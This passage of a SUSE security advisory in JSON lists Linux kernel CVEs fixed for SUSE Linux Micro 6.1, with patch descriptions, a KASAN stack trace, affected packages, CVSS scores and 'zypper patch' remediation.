"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-38728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb3: fix for slab out of bounds on mount to ksmbd\n\nWith KASAN enabled, it is possible to get a slab out of bounds\nduring mount to ksmbd due to missing check in parse_server_interfaces()\n(see below):\n\n BUG: KASAN: slab-out-of-bounds in\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n Read of size 4 at addr ffff8881433dba98 by task mount/9827\n\n CPU: 5 UID: 0 PID: 9827 Comm: mount Tainted: G\n OE 6.16.0-rc2-kasan #2 PREEMPT(voluntary)\n Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE\n Hardware name: Dell Inc. Precision Tower 3620/0MWYPT,\n BIOS 2.13.1 06/14/2019\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x9f/0xf0\n print_report+0xd1/0x670\n __virt_addr_valid+0x22c/0x430\n ? parse_server_interfaces+0x14ee/0x1880 [cifs]\n ? kasan_complete_mode_report_info+0x2a/0x1f0\n ? parse_server_interfaces+0x14ee/0x1880 [cifs]\n kasan_report+0xd6/0x110\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n __asan_report_load_n_noabort+0x13/0x20\n parse_server_interfaces+0x14ee/0x1880 [cifs]\n ? __pfx_parse_server_interfaces+0x10/0x10 [cifs]\n ? trace_hardirqs_on+0x51/0x60\n SMB3_request_interfaces+0x1ad/0x3f0 [cifs]\n ? __pfx_SMB3_request_interfaces+0x10/0x10 [cifs]\n ? SMB2_tcon+0x23c/0x15d0 [cifs]\n smb3_qfs_tcon+0x173/0x2b0 [cifs]\n ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs]\n ? cifs_get_tcon+0x105d/0x2120 [cifs]\n ? do_raw_spin_unlock+0x5d/0x200\n ? cifs_get_tcon+0x105d/0x2120 [cifs]\n ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs]\n cifs_mount_get_tcon+0x369/0xb90 [cifs]\n ? dfs_cache_find+0xe7/0x150 [cifs]\n dfs_mount_share+0x985/0x2970 [cifs]\n ? check_path.constprop.0+0x28/0x50\n ? save_trace+0x54/0x370\n ? __pfx_dfs_mount_share+0x10/0x10 [cifs]\n ? __lock_acquire+0xb82/0x2ba0\n ? __kasan_check_write+0x18/0x20\n cifs_mount+0xbc/0x9e0 [cifs]\n ? __pfx_cifs_mount+0x10/0x10 [cifs]\n ? do_raw_spin_unlock+0x5d/0x200\n ? cifs_setup_cifs_sb+0x29d/0x810 [cifs]\n cifs_smb3_do_mount+0x263/0x1990 [cifs]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38728",
"url": "https://www.suse.com/security/cve/CVE-2025-38728"
},
{
"category": "external",
"summary": "SUSE Bug 1249256 for CVE-2025-38728",
"url": "https://bugzilla.suse.com/1249256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-38728"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-39689"
},
{
"cve": "CVE-2025-39813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Fix potential warning in trace_printk_seq during ftrace_dump\n\nWhen calling ftrace_dump_one() concurrently with reading trace_pipe,\na WARN_ON_ONCE() in trace_printk_seq() can be triggered due to a race\ncondition.\n\nThe issue occurs because:\n\nCPU0 (ftrace_dump) CPU1 (reader)\necho z \u003e /proc/sysrq-trigger\n\n!trace_empty(\u0026iter)\ntrace_iterator_reset(\u0026iter) \u003c- len = size = 0\n cat /sys/kernel/tracing/trace_pipe\ntrace_find_next_entry_inc(\u0026iter)\n __find_next_entry\n ring_buffer_empty_cpu \u003c- all empty\n return NULL\n\ntrace_printk_seq(\u0026iter.seq)\n WARN_ON_ONCE(s-\u003eseq.len \u003e= s-\u003eseq.size)\n\nIn the context between trace_empty() and trace_find_next_entry_inc()\nduring ftrace_dump, the ring buffer data was consumed by other readers.\nThis caused trace_find_next_entry_inc to return NULL, failing to populate\n`iter.seq`. At this point, due to the prior trace_iterator_reset, both\n`iter.seq.len` and `iter.seq.size` were set to 0. Since they are equal,\nthe WARN_ON_ONCE condition is triggered.\n\nMove the trace_printk_seq() into the if block that checks to make sure the\nreturn value of trace_find_next_entry_inc() is non-NULL in\nftrace_dump_one(), ensuring the \u0027iter.seq\u0027 is properly populated before\nsubsequent operations.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39813",
"url": "https://www.suse.com/security/cve/CVE-2025-39813"
},
{
"category": "external",
"summary": "SUSE Bug 1250032 for CVE-2025-39813",
"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
